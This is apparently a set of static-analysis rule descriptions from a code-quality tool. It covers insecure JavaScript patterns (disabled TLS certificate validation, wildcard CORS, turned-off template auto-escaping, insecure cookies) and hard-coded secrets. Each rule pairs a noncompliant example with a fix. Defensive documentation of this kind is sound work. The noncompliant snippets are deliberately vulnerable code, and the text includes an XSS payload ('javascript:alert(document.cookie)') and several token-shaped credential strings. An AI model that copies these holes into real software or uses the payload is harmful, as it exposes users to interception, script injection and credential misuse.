const tls = require('node:tls');

let options = {
    rejectUnauthorized: false,
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Noncompliant

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

const tls = require('node:tls');

let options = {
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

javascript:S1442

This rule is deprecated; use S4507 instead.

Why is this an issue?

alert(...) as well as confirm(...) and prompt(...) can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed.

Noncompliant code example

if(unexpectedCondition) {
  alert("Unexpected Condition");
}

Resources

javascript:S4036

When executing an OS command without specifying the full path to the executable, the directories listed in your application’s PATH environment variable are searched for it. That search could leave an opening for an attacker if one of the directories in PATH is under their control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by untrusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

A fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

const cp = require('child_process');
cp.exec('file.exe'); // Sensitive

Compliant Solution

const cp = require('child_process');
cp.exec('/usr/bin/file.exe'); // Compliant

See

javascript:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independent OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example")
resource.addMethod(
    "GET",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.NONE // Sensitive
    }
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "no-auth", {
    apiId: api.ref,
    routeKey: "GET /no-auth",
    authorizationType: "NONE", // Sensitive
    target: exampleIntegration
})

Compliant Solution

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example",{
    defaultMethodOptions:{
        authorizationType: apigateway.AuthorizationType.IAM
    }
})
resource.addMethod(
    "POST",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.IAM
    }
)
resource.addMethod(  // authorizationType is inherited from the Resource's configured defaultMethodOptions
    "GET"
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "auth", {
    apiId: api.ref,
    routeKey: "POST /auth",
    authorizationType: "AWS_IAM",
    target: exampleIntegration
})

See

javascript:S5247

To reduce the risk of cross-site scripting attacks, templating systems such as Twig, Django, Smarty, and Groovy's template engine allow automatic variable escaping to be configured before templates are rendered. When escaping occurs, characters that make sense to the browser (e.g. <a>) are transformed/replaced with escaped/sanitized values (e.g. &lt;a&gt;).

Auto-escaping is not a magic feature that annihilates all cross-site scripting attacks; its effectiveness depends on the strategy applied and the context. For example, an "HTML auto-escaping" strategy (which only transforms HTML characters into HTML entities) is not sufficient when variables are used in an HTML attribute, because the ':' character is not escaped, making an attack like the one below possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)
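As an illustration of what an HTML-escaping strategy does, and why, per the caveat above, it does not neutralize a javascript: URL inside an href, a minimal sketch:

```javascript
// Replace characters meaningful to the browser with HTML entities.
// Note that ':' passes through untouched, so "javascript:..." survives.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(escapeHtml('<a>'));                 // &lt;a&gt;
console.log(escapeHtml('javascript:alert(1)')); // unchanged
```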

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

mustache.js template engine:

let Mustache = require("mustache");

Mustache.escape = function(text) {return text;}; // Sensitive

let rendered = Mustache.render(template, { name: inputName });

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";

let template = Handlebars.compile(source, { noEscape: true }); // Sensitive

markdown-it markup language parser:

const markdownIt = require('markdown-it');
let md = markdownIt({
  html: true // Sensitive
});

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: false // Sensitive
});

console.log(marked("# test <b>attack</b>"));

kramed markup language parser:

let kramed = require('kramed');

var options = {
  renderer: new kramed.Renderer({
    sanitize: false // Sensitive
  })
};

Compliant Solution

mustache.js template engine:

let Mustache = require("mustache");

let rendered = Mustache.render(template, { name: inputName }); // Compliant autoescaping is on by default

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";
let data = { "name": "<b>Alan</b>" };

let template = Handlebars.compile(source); // Compliant by default noEscape is set to false

markdown-it markup language parser:

let md = require('markdown-it')(); // Compliant by default html is set to false

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer()
}); // Compliant by default sanitize is set to true

console.log(marked("# test <b>attack</b>"));

kramed markup language parser:

let kramed = require('kramed');

let options = {
  renderer: new kramed.Renderer({
    sanitize: true // Compliant
  })
};

console.log(kramed('Attack [xss?](javascript:alert("xss")).', options));

See

javascript:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. If adversaries gain physical access to the storage medium or otherwise leak a message, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example'); // Sensitive

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

new CfnQueue(this, 'example'); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example', {
    encryption: QueueEncryption.KMS_MANAGED
});

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});

new CfnQueue(this, 'example', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

javascript:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led to vulnerabilities in the past.

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers to the response, called CORS headers, that act as directives for the browser and change the access control policy, i.e. relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use the * wildcard, and do not blindly return the Origin header content without any checks).

Sensitive Code Example

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': '*' }); // Sensitive
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let app1 = express();
app1.use(cors()); // Sensitive: by default origin is set to *

let corsOptions = {
  origin: '*' // Sensitive
};

let app2 = express();
app2.use(cors(corsOptions));

User-controlled origin:

function (req, res) {
  const origin = req.header('Origin');
  res.setHeader('Access-Control-Allow-Origin', origin); // Sensitive
};

Compliant Solution

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': 'trustedwebsite.com' }); // Compliant
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let corsOptions = {
  origin: 'trustedwebsite.com' // Compliant
};

let app = express();
app.use(cors(corsOptions));

User-controlled origin validated with an allow-list:

const trustedOrigins = ['https://trustedwebsite.com']; // hypothetical allow-list

function (req, res) {
  const origin = req.header('Origin');

  if (trustedOrigins.indexOf(origin) >= 0) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
};

See

javascript:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. If adversaries gain physical access to the storage medium or otherwise obtain the stored data, encryption keeps them from accessing it.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'unencrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: false // Sensitive
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'unencrypted-implicit-cfn', {
}); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'encrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: true
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'encrypted-explicit-cfn', {
    encrypted: true
});

See

javascript:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is, for instance, a session cookie that is not designed to be sent over non-HTTPS communication.
  • it is not certain whether the website serves mixed content (i.e. whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session cookies.

Sensitive Code Example

cookie-session module:

const cookieSession = require('cookie-session');

let session = cookieSession({
  secure: false, // Sensitive
}); // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: false // Sensitive
  }
}));

cookies module:

const Cookies = require('cookies');

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: false }}); // Sensitive

Compliant Solution

cookie-session module:

const cookieSession = require('cookie-session');

let session = cookieSession({
  secure: true, // Compliant
}); // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: true // Compliant
  }
}));

cookies module:

const Cookies = require('cookies');

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: true }}); // Compliant

See

secrets:S6701

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Telegram bot keys are used to authenticate and authorize a bot to interact with the Telegram Bot API. These keys are essentially access tokens that allow the bot to send and receive messages, manage groups and channels, and perform other actions on behalf of the bot.

If a Telegram bot key is accidentally exposed to an unintended audience, the primary concern is that unauthorized individuals may gain access to the bot’s functionalities and data. This could result in misuse or abuse of the bot’s capabilities. For instance, unauthorized users could send unsolicited messages, spam users, or engage in other disruptive activities using the bot.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("api_token", "7299363101:AAWJlilLyeMaKgTTrrfsyrtxDqqI-cdI-TF")

Compliant solution

props.set("api_token", System.getenv("API_TOKEN"))

Resources

Standards

secrets:S6700

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A RapidAPI key is a unique identifier that allows you to access and use APIs provided by RapidAPI. This key is used to track your API usage, manage your subscriptions, and ensure that you have the necessary permissions to access the APIs you are using. One RapidAPI key can be used to authenticate against a set of multiple other third-party services, depending on the key entitlement.

If a RapidAPI key leaks to an unintended audience, it can have several potential consequences. Especially, attackers may use the leaked key to access and utilize the APIs associated with that key without permission. This can result in unauthorized usage of API services, potentially leading to misuse, abuse, or excessive consumption of resources.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

RapidAPI services include an audit trail feature that can be used to audit malicious use of the compromised key.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("rapidapi_key", "6f1bbe24b9mshcbb5030202794a4p18f7d0jsndd55ab0f981d")

Compliant solution

props.set("rapidapi_key", System.getenv("rapidapi_key"))

Resources

Standards

Documentation

secrets:S6689

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

GitHub tokens are used for authentication and authorization purposes when interacting with the GitHub API. They serve as a way to identify and authenticate users or applications that are making requests to the GitHub API.

The consequences vary greatly depending on the situation and the secret-exposed audience. Still, two main scenarios should be considered.

Financial loss

Financial losses can occur when a secret is used to access a paid third-party service and is disclosed as part of the source code of client applications. With the secret in hand, every user of the application can use it without limit to consume the third-party service for their own needs, including in ways that were not intended.

This additional use of the secret will lead to added costs with the service provider.

Moreover, when rate or volume limiting is set up on the provider side, this additional use can prevent the regular operation of the affected application. This might result in a partial denial of service for all the application’s users.

Application’s security downgrade

A downgrade can happen when the disclosed secret is used to protect security-sensitive assets or features of the application. Depending on the affected asset or feature, the practical impact can range from a sensitive information leak to a complete takeover of the application, its hosting server or another linked component.

For example, an application that would disclose a secret used to sign user authentication tokens would be at risk of user identity impersonation. An attacker accessing the leaked secret could sign session tokens for arbitrary users and take over their privileges and entitlements.
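
The impersonation scenario above can be made concrete with a minimal sketch (the token format, names, and secret value are illustrative assumptions, not GitHub's actual scheme): any party holding the signing secret can mint tokens that verify successfully, so the server cannot tell a forged token from a legitimate one.

```python
import base64
import hashlib
import hmac

def sign_token(payload: bytes, secret: bytes) -> bytes:
    """Return payload.signature, where the signature is HMAC-SHA256 over the payload."""
    sig = hmac.new(secret, payload, hashlib.sha256).digest()
    return payload + b"." + base64.urlsafe_b64encode(sig)

def verify_token(token: bytes, secret: bytes) -> bool:
    payload, _, sig = token.rpartition(b".")
    expected = base64.urlsafe_b64encode(hmac.new(secret, payload, hashlib.sha256).digest())
    return hmac.compare_digest(sig, expected)

secret = b"leaked-signing-secret"  # hypothetical leaked value

# The legitimate server and an attacker holding the leaked secret produce
# indistinguishable tokens: possession of the secret is the only check.
forged = sign_token(b'{"user": "admin"}', secret)
assert verify_token(forged, secret)
```

Rotating the secret invalidates every outstanding token, forged or not, which is why revocation is the first remediation step.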

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("token", "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")

Compliant solution

props.set("token", System.getenv("TOKEN"))

Resources

Standards

Documentation

GitHub documentation - Managing your personal access tokens

secrets:S6703

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords are often used to authenticate users against database engines. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a database password leaks to an unintended audience, it can have serious consequences for the security of your database instance, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the database instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

public static string ConnectionString = "server=database-server;uid=user;pwd=P@ssw0rd;database=ProductionData";

Compliant solution

public static string ConnectionString = String.Format(
    "server=database-server;uid=user;pwd={0};database=ProductionData",
    Environment.GetEnvironmentVariable("DB_PASSWORD")
);

Resources

Standards

secrets:S6702

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A SonarQube token is a unique key that serves as an authentication mechanism for accessing the SonarQube platform’s APIs. It is used to securely authenticate and authorize external tools or services to interact with SonarQube.

Tokens are typically generated for specific users or applications and can be configured with different levels of access permissions. By using a token, external tools or services can perform actions such as analyzing code, retrieving analysis results, creating projects, or managing quality profiles within SonarQube.

If a SonarQube token leaks to an unintended audience, it can pose a security risk to the SonarQube instance and the associated projects. Attackers may use the leaked token to gain unauthorized access to the SonarQube instance. They can potentially view sensitive information, modify project settings, or perform other dangerous actions.

Additionally, attackers with access to a token can modify code analysis results. This can lead to false positives or negatives in the analysis, compromising the accuracy and reliability of the platform.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

The SonarQube audit log can be downloaded from the product web interface and can be used to audit the malicious use of the compromised key. This feature is available starting with SonarQube Enterprise Edition.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("sonar_secret", "squ_b4556a16fa2d28519d2451a911d2e073024010bc")

Compliant solution

props.set("sonar_secret", System.getenv("SONAR_SECRET"))

Resources

Standards

Documentation

secrets:S6686

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

If a Clarifai API key leaks to an unintended audience, it could potentially lead to unauthorized access to the Clarifai account and its associated data. This could result in the compromise of sensitive data or financial loss.

Financial loss

Financial losses can occur when a secret is used to access a paid third-party service and is disclosed as part of the source code of client applications. With the secret in hand, every user of the application can use it without limit to consume the third-party service for their own needs, including in ways that were not intended.

This additional use of the secret will lead to added costs with the service provider.

Moreover, when rate or volume limiting is set up on the provider side, this additional use can prevent the regular operation of the affected application. This might result in a partial denial of service for all the application’s users.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

from clarifai_grpc.grpc.api.status import status_code_pb2

metadata = (('authorization','Key d819f799b90bc8dbaffd83661782dbb7'),)

Compliant solution

import os
from clarifai_grpc.grpc.api.status import status_code_pb2

metadata = (('authorization',os.environ["CLARIFAI_API_KEY"]),)

Resources

Standards

secrets:S6688

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A Facebook application secret key is a unique authentication token assigned to a Facebook application. It is used to authenticate and authorize the application to access Facebook’s APIs and services. This key is required to perform actions on Facebook API, such as retrieving user data, posting on behalf of users, or accessing various Facebook features.

If a Facebook application secret key leaks to an unintended audience, it can have serious security-related consequences both for the associated Facebook application and its users. Especially, attackers knowing an application’s secret key will be able to access users' data that the application has been granted access to.

This can represent a severe confidentiality loss for Personally Identifiable Information. This might be against national regulatory requirements in some countries.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("facebook_secret", "a569a8eee3802560e1416edbc4ee119d")

Compliant solution

props.set("facebook_secret", System.getenv("FACEBOOK_SECRET"))

Resources

Standards

Documentation

secrets:S6687

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

If a Django secret key leaks to an unintended audience, it can have serious security implications for the corresponding application. The secret key is used to sign cookies and other sensitive data so that an attacker could potentially use it to perform malicious actions.

For example, an attacker could use the secret key to create their own cookies that appear to be legitimate, allowing them to bypass authentication and gain access to sensitive data or functionality.

In the worst-case scenario, an attacker could be able to execute arbitrary code on the application and take over its hosting server.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

In Django, changing the secret value is sufficient to invalidate any data that it protected. It is important not to add the revoked secret to the SECRET_KEY_FALLBACKS list: doing so would not prevent previously protected data from being used.
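
As a minimal sketch of this advice (the environment variable name is an assumption), a rotated settings module reads the new key from the environment or a vault and leaves the revoked key out of SECRET_KEY_FALLBACKS:

```python
# settings.py sketch: rotating the Django secret key. The environment variable
# name below is an assumption; production code should fail fast if it is unset.
import os

SECRET_KEY = os.environ.get("DJANGO_SECRET_KEY")

# Only keys that are still trusted belong here (e.g. during a planned rotation).
# Adding the *revoked* key would defeat the rotation: data signed with it
# would still be accepted.
SECRET_KEY_FALLBACKS = []
```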

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

SECRET_KEY = 'r&lvybzry1*k+qq)=x-!=0yd5l5#1gxzk!82@ru25*ntos3_9^'

Compliant solution

import os

SECRET_KEY = os.environ["SECRET_KEY"]

Resources

Standards

Documentation

secrets:S6705

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

An OpenWeather API key is a unique identifier that allows you to access the OpenWeatherMap API. The OpenWeatherMap API provides weather data and forecasts for various locations worldwide.

If an OpenWeather API key leaks to an unintended audience, it can have several security consequences. Attackers may use the leaked API key to access the OpenWeatherMap API and consume the weather data without proper authorization. This can lead to excessive usage, potentially exceeding the API rate limits, or violating the terms of service.

Moreover, depending on the pricing model of the corresponding OpenWeather account, unauthorized usage of the leaked API key can result in unexpected charges or increased costs. Attackers may consume a large amount of data or make excessive requests, leading to additional expenses for the API key owner.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

